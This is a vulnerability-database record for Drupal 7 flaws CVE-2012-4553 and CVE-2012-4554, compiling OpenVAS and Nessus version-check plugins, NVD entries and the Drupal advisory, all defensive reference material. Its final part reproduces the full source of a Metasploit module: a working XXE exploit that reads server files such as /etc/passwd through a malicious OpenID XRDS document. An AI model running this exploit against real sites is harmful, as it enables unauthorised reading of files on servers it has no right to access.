ID OPENVAS:72617 Type openvas Reporter Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com Modified 2017-04-21T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory.
#
#VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "The following package is affected: drupal7";
tag_solution = "Update your system with the appropriate patches or
software upgrades.
http://drupal.org/node/1815912
http://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html";
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory.";
if(description)
{
script_id(72617);
script_version("$Revision: 5999 $");
script_cve_id("CVE-2012-4553", "CVE-2012-4554");
script_tag(name:"last_modification", value:"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $");
script_tag(name:"creation_date", value:"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_name("FreeBSD Ports: drupal7");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com");
script_family("FreeBSD Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/freebsdrel", "login/SSH/success");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-bsd.inc");
vuln = 0;
txt = "";
bver = portver(pkg:"drupal7");
if(!isnull(bver) && revcomp(a:bver, b:"7.16")<0) {
txt += "Package drupal7 version " + bver + " is installed which is known to be vulnerable.\n";
vuln = 1;
}
if(vuln) {
security_message(data:string(txt ));
} else if (__pkg_match) {
exit(99);
}
{"href": "http://plugins.openvas.org/nasl.php?oid=72617", "history": [], "naslFamily": "FreeBSD Local Security Checks", "id": "OPENVAS:72617", "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-11-26T00:00:00", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "title": "FreeBSD Ports: drupal7", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "#\n#VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: drupal7\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://drupal.org/node/1815912\nhttp://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(72617);\n script_version(\"$Revision: 5999 $\");\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: drupal7\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"drupal7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.16\")<0) {\n txt += \"Package drupal7 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "pluginID": "72617", "hash": "9c1b370606b0ccbcf82af1f33a128b09885e96c54e2047d61df1701054e733f0", "references": [], "edition": 1, "cvelist": ["CVE-2012-4553", "CVE-2012-4554"], "lastseen": "2017-07-02T21:10:30", "viewCount": 4, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2017-07-02T21:10:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4553", "CVE-2012-4554"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231072617"]}, {"type": "nessus", "idList": ["DRUPAL_7_16.NASL"]}, {"type": "drupal", "idList": ["DRUPAL-SA-CORE-2012-003"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/DRUPAL_OPENID_XXE"]}], "modified": "2017-07-02T21:10:30"}, "vulnersScore": 5.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "4e85633231989ab1dcb881a8100d542f"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "b61b488598bc075b85e0c3d5f67ea70d"}, {"key": "href", "hash": "69ce1e951d4a6a1b0b61ca8f2da39616"}, {"key": "modified", "hash": "ac79630d1390466794385c2ba9d795e4"}, {"key": "naslFamily", "hash": "fe45aa727b58c1249bf04cfb7b4e6ae0"}, {"key": "pluginID", "hash": "05418f309486bdb413ee03c328b1c053"}, {"key": "published", "hash": "594208dc69a797a068f0b8b8688d938c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e34e2f978e4314ac3276e0e621a2704e"}, {"key": "sourceData", "hash": "544f4e3c710cdb9ac7ed4ae2aa93e8fa"}, {"key": "title", "hash": "820f496a98cd10f4744b1e83e472c356"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-04-21T00:00:00"}
{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Drupal 7.x before 7.16 allows remote attackers to obtain sensitive information and possibly re-install Drupal and execute arbitrary PHP code via an external database server, related to \"transient conditions.\"", "modified": "2012-11-12T21:56:00", "id": "CVE-2012-4553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4553", "published": "2012-11-11T13:00:00", "title": "CVE-2012-4553", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "The OpenID module in Drupal 7.x before 7.16 allows remote OpenID servers to read arbitrary files via a crafted DOCTYPE declaration in an XRDS file.", "modified": "2012-11-12T22:00:00", "id": "CVE-2012-4554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4554", "published": "2012-11-11T13:00:00", "title": "CVE-2012-4554", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-11-26T00:00:00", "id": "OPENVAS:136141256231072617", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231072617", "title": "FreeBSD Ports: drupal7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_drupal70.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.72617\");\n script_version(\"$Revision: 11762 $\");\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: drupal7\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://drupal.org/node/1815912\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"drupal7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.16\")<0) {\n txt += \"Package drupal7 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T02:26:11", "bulletinFamily": "scanner", "description": "The remote web server is running a version of Drupal that is 7.x prior\nto 7.16. It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - An arbitrary PHP code execution vulnerability exists due\n to an error in the ", "modified": "2019-11-02T00:00:00", "id": "DRUPAL_7_16.NASL", "href": "https://www.tenable.com/plugins/nessus/62678", "published": "2012-10-24T00:00:00", "title": "Drupal 7.x < 7.16 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62678);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_bugtraq_id(56103);\n\n script_name(english:\"Drupal 7.x < 7.16 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is 7.x prior\nto 7.16. It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - An arbitrary PHP code execution vulnerability exists due\n to an error in the 'installer.php' script. An attacker,\n under certain conditions, could use this to re-install\n Drupal via an external database server, which then could\n allow the execution of arbitrary PHP code on the\n original server. This vulnerability is mitigated by the\n fact that the re-installation can only be successful if\n the site's 'settings.php' file or directories are\n writeable by, or owned by, the web server user.\n (CVE-2012-4553)\n\n - An information disclosure vulnerability exists for sites\n using the OpenID module. This could allow an attacker to\n read files on the local system by attempting to log into\n the site using a malicious OpenID server.\n (CVE-2012-4554)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/node/1815912\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 7.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\nloc = build_url(qs:dir, port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# 7.x < 7.16 are affected\nif (version =~ \"^7\\.([0-9]|1[0-5])($|[^0-9]+)\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + loc +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.16' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, loc, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2019-05-31T19:28:10", "bulletinFamily": "software", "description": "Multiple vulnerabilities were discovered in Drupal core.\n\n### Arbitrary PHP code execution\n\nA bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server.\n\nThis vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a [recommended security best practice](<http://drupal.org/node/244924>). However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites.\n\nCVE: CVE-2012-4553\n\n### Information disclosure - OpenID module\n\nFor sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server.\n\nCVE: CVE-2012-4554\n\n## Versions affected\n\n * Drupal core 7.x versions prior to 7.16.\n\nDrupal 6 is not affected.\n\n## Solution\n\nInstall the latest version:\n\n * If you use Drupal 7.x, upgrade to [Drupal core 7.16](<http://drupal.org/node/1815904>).\n\nIf you are unable to deploy the security release immediately, removing or blocking access to install.php is a sufficient mitigation step for the arbitrary PHP code execution vulnerability.\n\nAlso see the [Drupal core](<http://drupal.org/project/drupal>) project page.\n\n## Reported by\n\n * The arbitrary PHP code execution vulnerability was reported by [Heine Deelstra](<http://drupal.org/user/17943>) and [Noam Rathaus](<http://drupal.org/user/2317662>) working with Beyond Security's SecuriTeam Secure Disclosure Program. Heine Deelstra is also a member of the Drupal Security Team.\n * The information disclosure vulnerability in the OpenID module was reported by [Reginaldo Silva](<http://drupal.org/user/2305626>).\n\n## Fixed by\n\n * The arbitrary PHP code execution vulnerability was fixed by [Damien Tournoud](<http://drupal.org/user/22211>), [David Rothstein](<http://drupal.org/user/124982>), [Peter Wolanin](<http://drupal.org/user/49851>), and [K\u00e1roly N\u00e9gyesi](<http://drupal.org/user/9446>), all members of the Drupal Security Team.\n * The information disclosure vulnerability in the OpenID module was fixed by [Reginaldo Silva](<http://drupal.org/user/2305626>), [Christian Schmidt](<http://drupal.org/user/216078>), [Vojt\u011bch Kus\u00fd](<http://drupal.org/user/56154>), and [Fr\u00e9d\u00e9ric Marand](<http://drupal.org/user/27985>), and by [Peter Wolanin](<http://drupal.org/user/49851>), [David Rothstein](<http://drupal.org/user/124982>), [Damien Tournoud](<http://drupal.org/user/22211>), and [Heine Deelstra](<http://drupal.org/user/17943>) of the Drupal Security Team.\n", "modified": "2012-10-17T00:00:00", "published": "2012-10-17T00:00:00", "id": "DRUPAL-SA-CORE-2012-003", "href": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2012-10-17/sa-core-2012-003-drupal-core", "type": "drupal", "title": "SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-27T02:51:35", "bulletinFamily": "exploit", "description": "This module abuses an XML External Entity Injection vulnerability on the OpenID module from Drupal. The vulnerability exists in the parsing of a malformed XRDS file coming from a malicious OpenID endpoint. This module has been tested successfully on Drupal 7.15 and 7.2 with the OpenID module enabled.\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-24T00:04:31", "id": "MSF:AUXILIARY/GATHER/DRUPAL_OPENID_XXE", "href": "", "type": "metasploit", "title": "Drupal OpenID External Entity Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include REXML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal OpenID External Entity Injection',\n 'Description' => %q{\n This module abuses an XML External Entity Injection\n vulnerability on the OpenID module from Drupal. The vulnerability exists\n in the parsing of a malformed XRDS file coming from a malicious OpenID\n endpoint. This module has been tested successfully on Drupal 7.15 and\n 7.2 with the OpenID module enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Reginaldo Silva', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4554' ],\n [ 'OSVDB', '86429' ],\n [ 'BID', '56103' ],\n [ 'URL', 'https://drupal.org/node/1815912' ],\n [ 'URL', 'http://drupalcode.org/project/drupal.git/commit/b912710' ],\n [ 'URL', 'http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]\n ],\n 'DisclosureDate' => 'Oct 17 2012'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base Drupal directory path\", '/drupal']),\n OptString.new('FILEPATH', [true, \"The filepath to read on the server\", \"/etc/passwd\"])\n ])\n\n end\n\n def xrds_file\n element_entity = <<-EOF\n<!ELEMENT URI ANY>\n<!ENTITY xxe SYSTEM \"file://#{datastore['FILEPATH']}\">\n EOF\n\n xml = Document.new\n\n xml.add(DocType.new('foo', \"[ #{element_entity} ]\"))\n\n xml.add_element(\n \"xrds:XRDS\",\n {\n 'xmlns:xrds' => \"xri://$xrds\",\n 'xmlns' => \"xri://$xrd*($v*2.0)\",\n 'xmlns:openid' => \"http://openid.net/xmlns/1.0\",\n })\n\n xrd = xml.root.add_element(\"XRD\")\n\n xrd.add_element(\n \"Status\",\n {\n \"cid\" => \"verified\"\n }\n )\n provider = xrd.add_element(\"ProviderID\")\n provider.text = \"xri://@\"\n\n canonical = xrd.add_element(\"CanonicalID\")\n canonical.text = \"http://example.com/user\"\n\n service = xrd.add_element(\"Service\")\n\n type_one = service.add_element(\"Type\")\n type_one.text = \"http://specs.openid.net/auth/2.0/signon\"\n\n type_two = service.add_element(\"Type\")\n type_two.text = \"http://openid.net/srv/ax/1.0\"\n\n uri = service.add_element(\"URI\")\n uri.text = \"METASPLOIT\"\n\n local_id = service.add_element(\"LocalID\")\n local_id.text = \"http://example.com/xrds\"\n\n return xml.to_s.gsub(/METASPLOIT/, \"#{get_uri}/#{@prefix}/&xxe;/#{@suffix}\") # To avoid html encoding\n end\n\n def check\n signature = Rex::Text.rand_text_alpha(5 + rand(5))\n res = send_openid_auth(signature)\n\n unless res\n vprint_status(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n if drupal_with_openid?(res, signature)\n return Exploit::CheckCode::Detected\n end\n\n if generated_with_drupal?(res)\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def run\n @prefix = Rex::Text.rand_text_alpha(4 + rand(4))\n @suffix = Rex::Text.rand_text_alpha(4 + rand(4))\n exploit\n end\n\n def primer\n res = send_openid_auth(get_uri)\n\n if res.nil?\n # nothing to do here...\n service.stop\n return\n end\n\n unless res.code == 500\n print_warning(\"Unexpected answer, trying to parse anyway...\")\n end\n\n error_loot = parse_loot(res.body)\n\n # Check if file was retrieved on the drupal answer\n # Better results, because there isn't URL encoding,\n # plus probably allows to retrieve longer files.\n print_status(\"Searching loot on the Drupal answer...\")\n unless loot?(error_loot)\n # Check if file was leaked to the fake OpenID endpoint\n # Contents are probably URL encoded, plus probably long\n # files aren't full, but something is something :-)\n print_status(\"Searching loot on HTTP query...\")\n loot?(@http_loot)\n end\n\n # stop the service so the auxiliary module ends\n service.stop\n end\n\n\n def on_request_uri(cli, request)\n if request.uri =~ /#{@prefix}/\n vprint_status(\"Signature found, parsing file...\")\n @http_loot = parse_loot(request.uri)\n return\n end\n\n print_status(\"Sending XRDS...\")\n send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })\n end\n\n def send_openid_auth(identifier)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.to_s, \"/\"),\n 'method' => 'POST',\n 'vars_get' => {\n \"q\" => \"node\",\n \"destination\" => \"node\"\n },\n 'vars_post' => {\n \"openid_identifier\" => identifier,\n \"name\" => \"\",\n \"pass\" => \"\",\n \"form_id\" => \"user_login_block\",\n \"op\" => \"Log in\"\n }\n })\n\n return res\n end\n\n def store(data)\n path = store_loot(\"drupal.file\", \"text/plain\", rhost, data, datastore['FILEPATH'])\n print_good(\"File found and saved to path: #{path}\")\n end\n\n def parse_loot(data)\n return nil if data.blank?\n\n # Full file found\n if data =~ /#{@prefix}\\/(.*)\\/#{@suffix}/m\n return $1\n end\n\n # Partial file found\n if data =~ /#{@prefix}\\/(.*)/m\n return $1\n end\n\n return nil\n end\n\n def loot?(data)\n return false if data.blank?\n store(data)\n return true\n end\n\n def drupal_with_openid?(http_response, signature)\n return false if http_response.blank?\n return false unless http_response.code == 200\n return false unless http_response.body =~ /openid_identifier.*#{signature}/\n return true\n end\n\n def generated_with_drupal?(http_response)\n return false if http_response.blank?\n return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/\n return true if http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/\n return false\n end\n\n\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/drupal_openid_xxe.rb"}]}